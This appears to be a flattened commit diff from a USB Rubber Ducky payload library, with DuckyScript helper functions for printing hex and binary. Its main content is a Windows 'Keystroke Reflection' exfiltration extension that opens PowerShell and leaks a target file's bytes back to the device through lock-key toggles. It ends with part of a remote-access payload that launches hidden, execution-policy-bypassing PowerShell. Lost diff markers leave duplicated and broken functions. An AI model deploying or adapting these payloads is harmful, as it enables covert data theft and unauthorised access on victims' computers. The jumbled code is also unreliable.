$DIGIT_PRINT_MODE = PRINT_HEX
VAR $chars = 0
VAR $d1 = 0
VAR $d2 = 0
VAR $d3 = 0
VAR $d4 = 0
WHILE ($INPUT > 0)
REM TO ENABLE SET INCLUDE_TRANSLATE_HEX to TRUE before compiling
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_HEX
FUNCTION TRANSLATE_HEX()
$DIGIT_PRINT_MODE = #PRINT_HEX
VAR $chars = 0
VAR $d1 = 0
VAR $d2 = 0
VAR $d3 = 0
VAR $d4 = 0
WHILE ($INPUT > 0)
IF ($chars == 0) THEN
$d1 = ($INPUT % 16)
ELSE IF ($chars == 1) THEN
$d2 = ($INPUT % 16)
ELSE IF ($chars == 2) THEN
$d3 = ($INPUT % 16)
ELSE IF ($chars == 3) THEN
$d4 = ($INPUT % 16)
END_IF
$chars = ($chars + 1)
$INPUT = ($INPUT / 16)
END_WHILE
VAR $i = 0
STRING 0x
IF ($chars == 0) THEN
$d1 = ($INPUT % 16)
STRING 0x0000
ELSE IF ($chars == 1) THEN
$d2 = ($INPUT % 16)
STRING 000
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 2) THEN
$d3 = ($INPUT % 16)
STRING 00
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 3) THEN
$d4 = ($INPUT % 16)
STRING 0
$D = $d3
PRINTDIGIT()
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 4) THEN
STRING 0
$D = $d4
PRINTDIGIT()
$D = $d3
PRINTDIGIT()
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
END_IF
$chars = ($chars + 1)
$INPUT = ($INPUT / 16)
END_WHILE
VAR $i = 0
STRING 0x
IF ($chars == 0) THEN
STRING 0x0000
ELSE IF ($chars == 1) THEN
STRING 000
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 2) THEN
STRING 00
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 3) THEN
STRING 0
$D = $d3
PRINTDIGIT()
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 4) THEN
STRING 0
$D = $d4
PRINTDIGIT()
$D = $d3
PRINTDIGIT()
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
END_IF
IF $NL THEN
ENTER
END_IF
END_FUNCTION
IF $AS_STRINGLN THEN
ENTER
END_IF
END_FUNCTION
END_IF_DEFINED
REM Translates a variable of presumed integer type and attempts to convert
REM and inject a BINARY string representation
FUNCTION TRANSLATE_BINARY()
VAR $I = 16
WHILE ( $I > 0 )
$I = ($I - 1)
IF (($INPUT & 0x8000) == 0 ) THEN
STRING 0
ELSE
STRING 1
REM TO ENABLE SET INCLUDE_TRANSLATE_BINARY to TRUE before compiling
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_BINARY
FUNCTION TRANSLATE_BINARY()
VAR $I = 16
WHILE ( $I > 0 )
$I = ($I - 1)
IF (($INPUT & 0x8000) == 0 ) THEN
STRING 0
ELSE
STRING 1
END_IF
$INPUT = ($INPUT << 1)
END_WHILE
IF $AS_STRINGLN THEN
ENTER
END_IF
$INPUT = ($INPUT << 1)
END_WHILE
IF $NL THEN
ENTER
END_IF
END_FUNCTION
END_FUNCTION
END_IF_DEFINED
END_EXTENSION

110
payloads/extensions/windows_hid_exfil.txt
View File

@ -1,51 +1,91 @@
EXTENSION WINDOWS_HID_EXFIL
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM Helpers for Keystroke Reflection data exfiltration
REM This payload is a proof of concept for USB HID only Data Exfiltration
REM_BLOCK DOCUMENTATION
Helpers for Keystroke Reflection data exfiltration
This payload is a proof of concept for USB HID only Data Exfiltration
REM TARGET:
REM Windows Hostthat supports powershell and SendKeys
TARGET:
Windows Host that supports powershell and SendKeys
REM USAGE:
REM Uncomment the function call below to run this extension inline
REM or call RUN_EXFIL() anywhere in your payload after the extension
USAGE:
Prepare data to exfil (in filename defined by TARGET_FILE below)
with a powershell window already open - call RUN_WINDOWS_EXFIL()
REM DEPLOYMENT:
REM Plug Ducky into host, wait for the LED to turn (and stay) solid Green.
DEPLOYMENT:
Plug Ducky into host, wait for the LED to turn (and stay) solid green.
END_REM
REM CONFIGURATION:
REM File on host machine to exfil using Keystroke Reflection attack
DEFINE TARGET_FILE filename.txt
REM File on host machine to exfil
DEFINE #TARGET_FILE filename.txt
DEFINE #SAVE_AND_RESTORE_LOCKS TRUE
DEFINE #ENABLE_EXFIL_LEDS TRUE
DEFINE #CLOSE_AFTER_EXFIL TRUE
DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE
FUNCTION RUN_WINDOWS_EXFIL()
REM Boot
LED_OFF
DELAY 500
REM Launch Windows RUN dialog
GUI r
DELAY 50
REM Launch powershell
STRING powershell
ENTER
DELAY 250
REM Save HOSTs current lock state
SAVE_HOST_KEYBOARD_LOCK_STATE
REM Start Listening - Enable EXFIL mode, Enable EXFIL mode for Device LEDS
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
SAVE_HOST_KEYBOARD_LOCK_STATE
END_IF_DEFINED
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
LED_OFF
$_EXFIL_LEDS_ENABLED = TRUE
END_IF_DEFINED
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
REM Convert and reflect target file
STRING foreach($b in $(Get-Content "TARGET_FILE" -Encoding byte)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){If($b -band $a){$o+="%{NUMLOCK}"}Else{$o+="%{CAPSLOCK}"}}};$o+="%{SCROLLLOCK}";Add-Type -Assembly System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait("$o");exit;
STRING_POWERSHELL
foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){
foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){
If($b -band $a){
$o+="%{NUMLOCK}"
}Else{
$o+="%{CAPSLOCK}"
}
}
};
$o+="%{SCROLLLOCK}";
Add-Type -Assembly System.Windows.Forms;
[System.Windows.Forms.SendKeys]::SendWait("$o");
exit;
END_STRING
IF_DEFINED_TRUE #CLOSE_AFTER_EXFIL
STRING exit;
END_IF_DEFINED
ENTER
REM Listen for EOF
WAIT_FOR_SCROLL_CHANGE
REM Indicate SUCCESS on Device LED, Disable EXFIL mode
LED_G
$_EXFIL_MODE_ENABLED = FALSE
REM Restore HOSTs lock state to original
RESTORE_HOST_KEYBOARD_LOCK_STATE
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
LED_G
END_IF_DEFINED
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
RESTORE_HOST_KEYBOARD_LOCK_STATE
END_IF_DEFINED
END_FUNCTION
REM Uncomment the function call below to run this extension inline (here)
REM or call RUN_WINDOWS_EXFIL() anywhere in your payload after the extension
REM RUN_WINDOWS_EXFIL()
IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO
REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template.
REM DEMO Boot Delay
DELAY 3000
REM Open run dialog
GUI r
DELAY 500
REM Open Powershell
STRINGLN powershell
DELAY 500
REM Prepare some data in TARGET_FILE
STRINGLN echo test123 > #TARGET_FILE
DELAY 500
REM Exfil data to USB Rubber Ducky using Keystroke Reflection
RUN_WINDOWS_EXFIL()
END_IF_DEFINED
END_EXTENSION

2
payloads/library/remote_access/ReverseDuckyUltimate/payload.txt
View File

@ -103,7 +103,7 @@ EXTENSION Rolling_Powershell_Execution
STRING powershell.exe -noP -nOnI -windo H
END_IF
IF_DEFINED #EXECUTIONPOLICY
IF_DEFINED_TRUE #EXECUTIONPOLICY
SPACE
IF (($RANDOM_PS % 2) == 0) THEN
STRING -ep ByPasS